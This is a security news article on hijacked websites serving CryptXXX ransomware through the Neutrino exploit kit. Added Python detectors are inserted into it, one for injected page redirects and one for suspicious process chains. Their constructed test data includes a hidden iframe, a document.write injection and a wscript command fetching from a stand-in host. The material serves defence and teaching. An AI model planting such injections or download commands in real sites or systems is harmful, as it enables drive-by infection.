Ransomware attacks are gaining ground as security researchers uncover that legitimate business websites are being hijacked to serve CryptXXX ransomware to unsuspecting visitors. Sites hit so far include Dunlop's DIY projects site, a recruitment firm, a Guatemalan tourism site, a Mexican city water supply firm's site and a security firm's own site.
According to Invincea security researcher Pat Belcher, a botnet known as SoakSoak or RealStatistics is likely powering the CryptXXX campaign. Botnets of this kind scan websites for vulnerabilities and compromise the underlying servers so that they can be used in further attacks. In this wave, SoakSoak injected malicious code into the hijacked websites that redirects visitors to a server hosting the Neutrino Exploit Kit, the infamous commodity malware-dropping tool sold via dark web marketplaces.
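A site owner's first question after reading this is whether their own pages carry an injected redirect of the kind described. The following Python is an added example, not code from the article or from Invincea, that scans page HTML for the usual tell-tales: script or iframe sources on hosts outside a first-party allowlist, hidden 1x1 or display:none iframes, and inline scripts that rewrite the location or document.write() a frame. The two sample pages, the `example-shop.test`, `stats-counter.test` and `landing.test` host names and the first-party list are all constructed for the demonstration; nothing here is taken from a real compromised site.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages (not copies of any real site). The second carries
# the kind of injection described above: a foreign script include, a hidden
# 1x1 iframe, and an inline document.write() that drops another frame.
CLEAN_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-shop.test/lib.js"></script>
</head><body><h1>Shop</h1></body></html>"""

INJECTED_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="//stats-counter.test/code.js"></script>
</head><body><h1>Shop</h1>
<iframe src="http://landing.test/gate.php" width="1" height="1" style="display:none"></iframe>
<script>document.write('<iframe src="http://landing.test/x.php"></iframe>');</script>
</body></html>"""

# Inline-script substrings that usually mean "send the visitor somewhere else".
REDIRECT_MARKERS = ("location.href", "location.replace(", "document.write(", "window.location")


class _TagCollector(HTMLParser):
    """Collect <script src>, <iframe src> and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.externals = []        # (tag, src, attrs) in document order
        self.inline_scripts = []   # script bodies without a src attribute
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe") and attrs.get("src"):
            self.externals.append((tag, attrs["src"], attrs))
        if tag == "script" and not attrs.get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def _is_first_party(src, first_party_hosts):
    host = urlparse(src).hostname
    if host is None:               # relative URL: served by this site itself
        return True
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in first_party_hosts)


def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = (attrs.get("width") or "").strip() in ("0", "1") or \
           (attrs.get("height") or "").strip() in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_injected_redirects(html, first_party_hosts):
    """Return (kind, detail) findings for content that looks like an injected redirect."""
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, src, attrs in parser.externals:
        if not _is_first_party(src, first_party_hosts):
            findings.append(("external-" + tag, src))
        if tag == "iframe" and _is_hidden(attrs):
            findings.append(("hidden-iframe", src))
    for body in parser.inline_scripts:
        if any(marker in body for marker in REDIRECT_MARKERS):
            findings.append(("inline-redirect", body.strip()[:60]))
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, find_injected_redirects(page, {"example-shop.test"}))
```

Run this against a fetch of each page from the server's own template files as well as over HTTP: the SoakSoak-style compromise modifies files on disk, so a diff between the two views, or a non-empty result from a baseline that used to return nothing, is the actionable signal. The allowlist check is deliberately strict about subdomains; a CDN on a different registrable domain must be added to `first_party_hosts` explicitly.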
"Once a victim is redirected to the Neutrino Exploit Kit, the endpoint is scanned to check if it is using any security software such as VMware, Wireshark, ESET, Fiddler or a Flash Player debugging utility. If those programs are not present on the victim host, the command shell is opened and the Windows utility Wscript is accessed to download the ransomware payload from a command and control server," said Belcher.
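The anti-analysis check Belcher describes happens inside the browser exploit and leaves little for host telemetry to see, but the step that follows it does: a browser process spawning cmd.exe, which in turn spawns wscript.exe to fetch the payload. The Python below is an added example, not code from the article or from Invincea, that runs that detection over process-creation events. The event records are constructed to look like an EDR or Sysmon process-creation feed (pid, parent pid, image path, command line); the process names, paths and the `payload.test` URL are assumptions made for the demonstration. It generalizes slightly beyond the quoted chain by also flagging a script host handed a URL directly on its command line, since that is the same download behaviour without the cmd.exe hop.

```python
import ntpath
import re

# Constructed process-creation events (not real telemetry), in the order a
# Sysmon Event ID 1 or EDR feed would deliver them.
EVENTS = [
    {"pid": 1000, "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": "iexplore.exe"},
    # The chain from the quote: browser -> cmd.exe -> wscript.exe on a dropped script.
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c wscript.exe //B C:\Users\u\AppData\Local\Temp\upd.js"},
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\upd.js"},
    # Benign: an administrator runs a logon script from an interactive shell.
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},
    # Script host handed a download URL directly (hypothetical host name).
    {"pid": 4000, "ppid": 1000, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe //B //E:jscript C:\\Temp\\get.js http://payload.test/p.bin"},
]

# Process names treated as the browser side of the chain (assumed list; extend
# it with whatever browsers and plugin containers your fleet actually runs).
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "flashplayerplugin.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _basename(image):
    return ntpath.basename(image).lower()


def ancestors(pid, by_pid, max_depth=8):
    """Yield the ancestor events of pid, nearest parent first.

    Stops at a process whose parent is not in the feed, after max_depth hops,
    or if the parent links form a loop (pid reuse can produce one)."""
    seen = set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and len(seen) < max_depth:
        parent = by_pid[ev["ppid"]]
        if parent["pid"] in seen:
            break
        seen.add(parent["pid"])
        yield parent
        ev = parent


def detect_script_download_chain(events):
    """Return (pid, reason) alerts for script hosts launched the way the quote describes."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if _basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = [_basename(a["image"]) for a in ancestors(e["pid"], by_pid)]
        if "cmd.exe" in chain and any(name in BROWSERS for name in chain):
            alerts.append((e["pid"], "browser -> cmd.exe -> script host chain: " + " <- ".join(chain)))
        if URL_RE.search(e["cmdline"]):
            alerts.append((e["pid"], "script host launched with a URL on the command line"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect_script_download_chain(EVENTS):
        print(pid, reason)
```

The benign logon script (pid 3100) is not flagged because its ancestry is cmd.exe under explorer.exe with no browser in the chain; that is the distinction a production rule needs, since cmd.exe and wscript.exe on their own are far too common to alert on. Process telemetry has to include parent pids for this to work, and the `max_depth` bound keeps a feed with recycled pids from walking forever.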
This is not the first large-scale attack attributed to the SoakSoak botnet. In 2014, security firm Sucuri found that it had compromised over 100,000 WordPress websites, leading Google to blacklist over 11,000 of them in a single day. Both the ransomware and the exploit kit have since been updated, to evade security detection software and to lure in more victims.
The constant evolution of the CryptXXX ransomware
The ransomware has several variants, and its recent campaigns indicate that cybercriminals are banking on new variants to launch extensive attacks. A recent report by security firm Proofpoint shows a strain of the ransomware being distributed by spam email for the first time.
"CryptXXX ransomware has propagated rapidly since appearing earlier this year. The ransomware was initially linked to groups associated with Angler and was distributed almost exclusively via Angler. As Angler activity dried up over this quarter, many actors turned to instances of the Neutrino exploit kit for distribution. Not surprisingly, with the disruption in the EK market, it appears that CryptXXX actors are turning to email as well," Proofpoint said.